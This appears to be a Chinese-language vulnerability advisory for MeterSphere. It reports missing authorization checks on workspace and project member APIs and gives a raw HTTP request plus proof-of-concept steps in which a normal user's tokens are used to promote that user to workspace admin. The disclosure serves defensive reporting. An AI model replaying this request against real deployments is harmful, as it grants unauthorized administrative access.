目前metersphere 一些关键的API缺少了权限检查,比如workspace中的/setting/workspace/member/update,/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。
以workspace中的/setting/workspace/member/update 为例
POST /setting/workspace/member/update HTTP/1.1
Host: 192.168.213.128:8081
Content-Length: 144
Accept-Language: zh-CN
WORKSPACE: bd6fc04b-15af-43dc-8cb6-411deaec81a7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: application/json, text/plain, */*
CSRF-TOKEN: 7wl7UAaQcpdQ+lolQXV1WYWQ+BLvd2bx2BQS22BoFb3UGqDlIbQjbELrNWgOzLgfc4YPf6nSUgllo/qpOudisg==
X-AUTH-TOKEN: 52d843aa-8791-43be-a191-f04f975f2be2
PROJECT: 2d2c879f-3f78-4701-aa6f-35aeedc25069
Origin: http://192.168.213.128:8081
Referer: http://192.168.213.128:8081/
Accept-Encoding: gzip, deflate
Cookie: __stripe_mid=f2258077-6e3a-4225-8013-a67c38c075f2242a35; step_dashboard=true; step_client_index=true; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; lastTaskModule=0; lastBugModule=0; preBranch=0; storyPreExecutionID=1; lastProduct=0; lastDocModule=0; checkedItem=6%2C4%2C3; docFilesViewType=card; preProductID=1; goback=%7B%22execution%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22admin%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fcompany-browse.html%22%2C%22qa%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fbug-view-7.html%22%2C%22doc%22%3A%22http%3A%5C%2F%5C%2F192.168.213.128%5C%2Fdoc-objectLibs-custom-0-9.html%22%7D; tab=execution
Connection: close
{"id":"user2","name":"user2","email":"user2@test.com","phone":null,"groupIds":["ws_admin"],"workspaceId":"bd6fc04b-15af-43dc-8cb6-411deaec81a7"}
Summary
目前metersphere 一些关键的API缺少了权限检查,比如workspace中的/setting/workspace/member/update,/setting/user/special/ws/member/add, /special/ws/member/delete/{workspaceId}/{userId} 以及project相关的API。
PoC
以workspace中的/setting/workspace/member/update利用为例
1 user1 是workspace1的空间管理员
2 user2 是workspace1的成员
3 user1 更新user2的信息,比如将其更新为空间管理员
4 使用burpsuite拦截请求
5 将上述请求中的CSRF-TOKEN和X-AUTH-TOKEN替换成user2的,即以user2的身份执行请求
6 发现执行结果成功,即普通用户可以执行管理员才能执行的update
Impact
普通用户可以执行空间管理员或者project管理员才能执行的API,比如可以将普通用户更新成空间管理员。